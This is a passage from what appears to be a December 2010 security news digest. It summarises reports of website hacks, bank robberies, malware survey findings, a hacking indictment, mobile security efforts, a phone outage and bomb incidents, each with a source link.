18. December 25, Krebs on Security – (International) Carders.cc, Backtrack-linux.org and Exploit-db.org Hacked. Carders.cc, a German security forum that specializes in trading stolen credit cards and other purloined data, has been hacked by security vigilantes for the second time this year. Also waking up to “you’ve been owned” calling cards this Christmas are exploit database exploit-db.org and backtrack-linux.org, the home of Backtrack, an open source “live CD” distribution of Linux. The hacks were detailed in the second edition of “Owned and Exposed,” an ezine whose first edition in May included the internal database and thousands of stolen credit card numbers and passwords from Carders.cc. The Christmas version of the ezine does not feature credit card numbers, but it does list the user names and hashed passwords of the carders.cc forum administrators. The main administrator for exploit-db.org and backtrack-linux.org, confirmed the hacks against the sites were legitimate. In an e-mail, he provided a link to a short statement, noting a hacking team called inj3ct0r initially took credit for the attack, only to find itself also targeted in the current edition of Owned and Exposed. Source: http://krebsonsecurity.com/2010/12/carders-cc-linux-exploit-org-and-exploit-db-org-hacked/

19. December 25, Hillsdale Daily News – (Michigan) Hillsdale-area authorities seek bank robbery suspect. Authorities now believe the same man is responsible for three separate bank robberies of two Southern Michigan Bank and Trust branches in the past year. The most recent robbery occurred December 21 at the Camden branch. A witness at the bank described a car similar to the one spotted near the North Adams branch on the bank’s video surveillance system around the time it was robbed November 22. The car closely matched a mid-90s Buick Regal. A composite sketch of the suspect as described by a witness, has been released. The witness saw the man before the first robbery of the North Adams branch February 17. The witness said the man was acting suspiciously in the parking lot. A detective with the Hillsdale County Sheriff’s Depart-ment said the Camden bank’s last customer before the robbery saw a car parked in the bank lot facing out toward the street near the entrance. The detective said it struck the witness as odd that the vehicle was not in a parking space. As the customer approached the bank, a man started to get out of the car, but stopped when he saw them and got back into the car. The car was described as a white, four-door sedan with a dirty grey trim on the lower door from front to back which is similar in appearance to a mid-90s Buick Regal. The Hillsdale sheriff’s department is investigating the robberies in conjunction with the Michigan State Police and the FBI. Source: http://www.lenconnect.com/news/x1651495527/Hillsdale-area-authorities-seek-bank-robbery-suspect

20. December 25, White Mountain Independent – (Arizona) ‘Skeletor Bandit’ indicted - Defendant charged with robbing banks in Northern AZ. A federal grand jury in Phoenix, Arizona returned a six-count indictment against a 51-year-old male suspect, who hails from Lincoln, California, charging him with multiple bank robberies in Arizona. He is accused of being the “Skeletor Bandit” responsible for robbing six banks. The indictment alleges that between October 22, and December 11, 2010, the suspect robbed six banks in Flagstaff, Phoenix, Prescott, and Surprise. In the first four robberies, the suspect wore a Halloween-style rubber mask with a black hooded sweatshirt while displaying a gun. The robber was dubbed the “Skeletor Bandit” based on the mask’s resemblance to a cartoon character from the 1980’s. In the last two robberies, he wore a fake beard, wig and nose along with a New York Yankees cap, and told witnesses he was armed. The suspect is in custody and will go to trial February 1, 2011 before a U.S. district judge in Phoenix. Source: http://www.wmicentral.com/police/article_94b7b6d8-0ee8-11e0-9397-001cc4c002e0.html

For another story, see item 39 below

Information Technology

38. December 27, SpamfighterNews – (National) Kindsight research reveals 33% home PCs hacked. Kindsight, the developer of “Identity Protection” recently announced 30-day research outcomes after surveying about 200,000 North American households that use the Internet. As a result, it was revealed that 33 percent of household personal computers contracted malware infections and were in severe danger of cyber-crime, ID-theft, and other attacks. Furthermore, after classifying the attacks into four groups, the research found spyware was behind 47 percent of the assaults, whilst Trojans along with other malware leading to ID-theft was behind 21 percent. Botnet attacks, which enable malefactors to seize control over home computers, successfully targeted 26 percent of the contaminated home PCs, while conventional viruses accounted for merely 6 percent of the assaults. Source: http://www.spamfighter.com/News-15556-Kindsight-Research-Reveals-33-Home-PCs-Hacked.htm

39. December 23, Federal Bureau of Investigation – (Minnesota; Texas) Texas man indicted for hacking into computer network, stealing $274,000. A federal indictment unsealed December 23 alleged a 35-year-old Texas man hacked into the computer network of an Eden Prairie, Minnesota, business and stole approximately $274,000. The indictment, which was filed in Minneapolis October 13, 2010, charges the suspect, of Houston, Texas, with one count of unauthorized access to a protected computer in furtherance of fraud, and one count of wire fraud. The indictment was unsealed following the suspect’s initial appearance in United States District Court. The indictment alleges that from December 23, 2008, through October 15, 2009, the suspect hacked into the computer network in order to obtain money belonging to Digital River, Inc., a cyber-based business, through a subsidiary, SWReg., Inc. Source: http://7thspace.com/headlines/367783/texas_man_indicted_for_hacking_into_computer_network_stealing_274000__.html

For another story, see item 40 below.

Communications Sector

40. December 26, eWeek – (National) Verizon, RIM investing in mobile security to protect phones from attackers. Carriers, developers, and phone makers are rolling out new services and features to protect mobile devices from malicious attacks and data breaches. As people increase their use of smartphones to check e-mail, do their banking, and access documents, the wireless industry is addressing mobile device security. The effort is not limited to IT administrators within the enterprises, as carriers and phone makers are deploying new features and services to bring security to the mobile devices, according to the Wall Street Journal. “Everyone is realizing that this is an uncontrolled environment. We don’t want to have the same problems that we had with PCs,” the chief security officer of AT&T, told the Wall Street Journal. Several security vendors have raised the alarm, predicting that various types of mobile threats will appear in 2011. Researchers at Panda Security said there will be new attacks on mobile devices, “but not on a massive scale,” which will target Symbian- and Android-based phones. In many cases, some of the security features are already available within the smartphone operating system. For example, one of the most frequently touted mobile security features for preventing data breaches, remote wipe, is available in the latest version of the Android operating system, as well as for the BlackBerry and iPhone. Source: http://www.eweek.com/c/a/Security/Verizon-RIM-Investing-in-Mobile-Security-to-Protect-Phones-from-Attackers-391875/

41. December 25, Associated Press – (Hawaii) Heavy rain disrupts Oahu landline phone service. Hawaiian Telcom said heavy rain the weekend of December 18 and 19 on the island of Oahu, Hawaii caused water to seep into the company’s cables, shorting circuits and disrupting landline service. The company said cables must be dried out and replaced. This means some customers were expected to temporarily lose service or notice static on the line. The Honolulu Star-Advertiser said readers in Makiki, Pearl City, and Aiea reported phone outages December 23. A Hawaiian Telcom spokesman said crews were working every day in 10- to 12-hour shifts, and would be working through December 25. Technicians from the neighbor islands were flown in to assist with repair efforts. Source: http://www.kpua.net/news.php?id=21886

42. December 25, KDVR 31 Denver – (Colorado) Englewood Police investigate molotov cocktail attack. Authorities recovered as many as 10 explosive devices from inside an Englewood, Colorado cell phone store December 24 after what appears to be a failed attempt to set fire to the business. Officers responded to CTG Wireless, located at 4720 South Santa Fe Circle, at about 7 a.m. after someone called Englewood Police to report several windows had been broken. Inside the store, authorities found as many as 10 explosive devices similar to a “Molotov Cocktail,” said an officer with Englewood Police. “The decision was made to call the Arapahoe County bomb squad just as a precaution,” he said. None of the devices detonated and damage to the store was minimal. Still, neighboring businesses in the strip mall were evacuated until the bomb squad determined the devices no longer posed a threat. Englewood police said the Bureau of Alcohol, Tobacco, Firearms and Explosives is assisting the investigation. Source: http://www.kwgn.com/news/kdvr-explosive-devices-found-in-eng-122410,0,5203900.story

43. December 24, KYMA 11 Yuma/El Centro – (Arizona) Bomb threat called into call center. San Luis, Arizona police officers told News 11 someone called the police department around noon, December 24, claiming there was a bomb at the ACT call center in San Luis. Officers said hundreds of people were at work and had to be evacuated for about two and a half hours. Police brought in a military police bomb detection dog. At about 2:30 p.m., police gave the all clear, and everyone was let back in the building. Police are looking for the person or persons who called in the bomb threat. Source: http://www.kyma.com/slp.php?idN=4519&cat=Local News